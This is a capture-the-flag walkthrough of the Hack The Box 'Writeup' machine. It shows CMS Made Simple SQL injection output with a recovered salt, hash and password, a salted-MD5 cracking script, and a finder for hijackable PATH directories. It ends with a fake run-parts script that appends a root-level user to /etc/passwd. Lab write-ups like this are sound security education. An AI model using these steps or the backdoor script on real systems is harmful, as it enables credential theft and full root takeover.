HTB “ Writeup” Machine - Walkthrough
@cyberpj at HTB
Retired machine, but you can still access it until the end of July :)
Let's get started.
About: "Writeup" is a machine whose foothold relies on exploiting a publicly known CVE.
As usual, we start with an Nmap scan to find the open ports, the services running on them, and more.
First add the host to /etc/hosts. Note that `sudo echo ... >> /etc/hosts` does not work, because the `>>` redirection is performed by your unprivileged shell, not by sudo; pipe through tee instead:
echo "10.10.10.138 Writeup.htb" | sudo tee -a /etc/hosts
└─$ ⚡sudo nmap -sC -sV 10.10.10.138 -oN full_scan
Nmap scan report for 10.10.10.138
Host is up (0.20s latency).
Not shown: 998 filtered ports
PORT STATE SERVICE VERSION
22/tcp open ssh OpenSSH 7.4p1 Debian 10+deb9u6 (protocol 2.0)
| 2048 dd:53:10:70:0b:d0:47:0a:e2:7e:4a:b6:42:98:23:c7 (RSA)
| 256 37:2e:14:68:ae:b9:c2:34:2b:6e:d9:92:bc:bf:bd:28 (ECDSA)
|_ 256 93:ea:a8:40:42:c1:a8:33:85:b3:56:00:62:1c:a0:ab (ED25519)
80/tcp open http Apache httpd 2.4.25 ((Debian))
| http-robots.txt: 1 disallowed entry
|_http-title: Nothing here yet.
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel
Open ports: 22/tcp (SSH), 80/tcp (HTTP).
Let's start with port 80.
Before running dirb against the web server, check robots.txt; Nmap already reported one disallowed entry there.
As you can see, that entry is exactly what we need!
It's just a writeup blog.
Directory enumeration: nothing too interesting.
Checking the page source reveals which CMS is in use.
Is there any known vulnerability for this CMS?
CMS Made Simple is a free, open-source content management system that provides developers, programmers, and site owners with a web-based development and administration area. In 2017 it won the CMS Critic annual award for Best Open Source Content Management.
First let's check the most common public exploit for it:
CMS Made Simple < 2.2.10 - SQL Injection (Exploit-DB 46635, a Python 2 script)
Even after converting the script to Unix line endings you'll hit an ImportError for the termcolor module.
Simply remove the termcolor import and the colour calls; they are only cosmetic.
[+] Salt for password found: 5a599ef579066807
[+] Username found: jkr
[+] Email found: email@example.com
[+] Password found: 62def4866937f08cc13bab43bb14e6f7
[+] Password cracked: raykayjay9
Here we go.
The --crack flag, given a wordlist, cracks the recovered hash for us, so no extra work is needed.
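As an added example (not part of the original writeup or of the exploit script), here is what the --crack flag does, written as plain shell: CMS Made Simple stores the admin password as md5(salt + password), so cracking means hashing each wordlist candidate together with the recovered salt and comparing the digest with the recovered hash. The salt and hash are the ones shown above; the four-word wordlist is constructed for the demo, a real run would use rockyou.txt or similar.

```shell
#!/bin/sh
# Added example, not from the original writeup or the exploit script.
# CMS Made Simple stores admin passwords as md5(salt + password); a candidate
# is correct when md5(salt . candidate) equals the hash pulled from the DB.

# Usage: cmsms_hash <salt> <password>   -> prints the hex digest
cmsms_hash() {
    printf '%s%s' "$1" "$2" | md5sum | cut -d ' ' -f 1
}

# Usage: cmsms_crack <salt> <hash> <wordlist-file>
# Prints the matching candidate and returns 0, or returns 1 if nothing matched.
cmsms_crack() {
    salt=$1; target=$2; wordlist=$3
    # "|| [ -n ... ]" also handles a last line without a trailing newline
    while IFS= read -r candidate || [ -n "$candidate" ]; do
        if [ "$(cmsms_hash "$salt" "$candidate")" = "$target" ]; then
            printf '%s\n' "$candidate"
            return 0
        fi
    done < "$wordlist"
    return 1
}

# Demo with the salt and hash the exploit recovered on this box and a tiny
# constructed wordlist.
demo_wordlist=$(mktemp)
printf '%s\n' password 123456 raykayjay9 letmein > "$demo_wordlist"
cmsms_crack 5a599ef579066807 62def4866937f08cc13bab43bb14e6f7 "$demo_wordlist" \
    || echo "no match in demo wordlist"
rm -f "$demo_wordlist"
```

Hashing one candidate at a time through md5sum is slow (one process per guess), which is fine to understand the mechanism but not for a real wordlist; for that, hand the salt and hash to hashcat or john in the corresponding salted-MD5 mode.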
SSH in as jkr with the cracked password:
ssh jkr@writeup.htb
Enumerate the files and directories for anything that looks useful.
Use pspy to see which processes are running at the time!
pspy is a command line tool designed to snoop on processes without the need for root permissions. It lets you see commands run by other users, cron jobs, etc.
Running pspy, you can see that on every successful SSH login root runs run-parts, invoked by bare name (looked up through PATH) rather than by absolute path:
Basically, run-parts(8) takes a directory as an argument and runs every script found in that directory. For example, if you list /etc/cron.hourly, you'll see that it's a directory where you can put executable files to be run every hour.
uid=1000(jkr) gid=1000(jkr) groups=1000(jkr),24(cdrom),25(floppy),29(audio),30(dip),44(video),46(plugdev),50(staff),103(netdev)
1. We are a member of the staff group!
jkr@writeup:~$ find / -group staff 2>/dev/null
Members of staff can write to /usr/local/bin.
The real run-parts binary lives in /bin:
jkr@writeup:~$ which run-parts
In the PATH used by the login hook, /usr/local/bin comes before /usr/bin and /bin, so a file named run-parts placed in /usr/local/bin is found first.
ls -la /usr/
drwxrwsr-x 10 root staff 4.0K Jul 26 12:25 local
jkr@writeup:/usr/local$ ls -la
drwxrwsr-x 10 root staff 4096 Jul 26 12:25 .
drwxr-xr-x 10 root root 4096 Apr 19 2019 ..
drwx-wsr-x 2 root staff 20480 Jul 26 12:54 bin
drwxrwsr-x 2 root staff 4096 Apr 19 2019 etc
drwxrwsr-x 2 root staff 4096 Apr 19 2019 games
drwxrwsr-x 2 root staff 4096 Apr 19 2019 include
drwxrwsr-x 4 root staff 4096 Apr 24 2019 lib
lrwxrwxrwx 1 root staff 9 Apr 19 2019 man -> share/man
drwx-wsr-x 2 root staff 12288 Jul 26 09:28 sbin
drwxrwsr-x 7 root staff 4096 Apr 19 2019 share
drwxrwsr-x 2 root staff 4096 Apr 19 2019 src
So the staff group has write permission on /usr/local/bin (note the s in the group bits: the directory is setgid, so anything created inside inherits the staff group).
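The check a practitioner wants at this point, as an added example that is not part of the original writeup: given a command name and a PATH string, list the PATH directories that are searched before the one actually holding the command and that the current user can write to. Every directory printed is a hijack point exactly like /usr/local/bin on this box. The PATH string in the demo call is the Debian default login PATH and is an assumption; it is not copied from the page's pspy output.

```shell
#!/bin/sh
# Added example, not from the original writeup.
# Print every directory that (a) is searched before the directory that really
# contains <command> and (b) is writable by the current user. A same-named
# file planted there is what a privileged process using this PATH will run.
# Usage: hijackable_dirs <command> [PATH-string]   (defaults to $PATH)
hijackable_dirs() {
    cmd=$1
    searchpath=${2:-$PATH}
    (
        set -f                  # no globbing while we split on ':'
        IFS=:
        for d in $searchpath; do
            if [ -z "$d" ]; then d=.; fi    # an empty PATH entry means "."
            if [ -x "$d/$cmd" ]; then
                break           # this is what actually runs; stop looking
            fi
            if [ -w "$d" ]; then
                printf '%s\n' "$d"
            fi
        done
        true
    )
    return 0
}

# Demo: assumed PATH of the root-run login hook (Debian default). On this box
# /usr/local/bin is writable by staff and precedes /bin, so it gets printed
# when run as jkr on the target.
hijackable_dirs run-parts "/usr/local/sbin:/usr/local/bin:/usr/sbin:/usr/bin:/sbin:/bin"
```

Run it on the target as the low-privileged user, passing the PATH the privileged process actually uses (taken from the pspy output, not from your own shell): the result only means something for the PATH the victim process searches. The same function doubles as a defensive audit when run from a hardening checklist, where any output at all is a finding.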
Generate a password hash on the attacking machine (the password being hashed here is the string "root"):
└─$ ⚡openssl passwd -1 root
Now create a fake run-parts in /usr/local/bin that appends a new UID 0 user to /etc/passwd; the hook runs as root, so the write succeeds:
jkr@writeup:/usr/local/bin$ nano run-parts
#!/bin/bash
echo 'cyberpj:$1$tI6VOEDZ$wVcNyaPAUt7R06gAbMH3j.:0:0:root:/root:/bin/bash' >> /etc/passwd
jkr@writeup:/usr/local/bin$ chmod +x run-parts
jkr@writeup:/usr/local/bin$ which run-parts
Now log in again over SSH so the root-run hook picks up our file:
└─$ ⚡ssh jkr@writeup.htb
The programs included with the Devuan GNU/Linux system are free software;
the exact distribution terms for each program are described in the
individual files in /usr/share/doc/*/copyright.
Devuan GNU/Linux comes with ABSOLUTELY NO WARRANTY, to the extent
permitted by applicable law.
Last login: Mon Jul 26 13:22:26 2021 from 10.10.14.106
jkr@writeup:~$ su cyberpj
Password: root (the string we hashed with openssl above)
Note: be quick with this privilege escalation; the planted file will not stay in place for long.
htb , writeup walkthrough- @cyberpj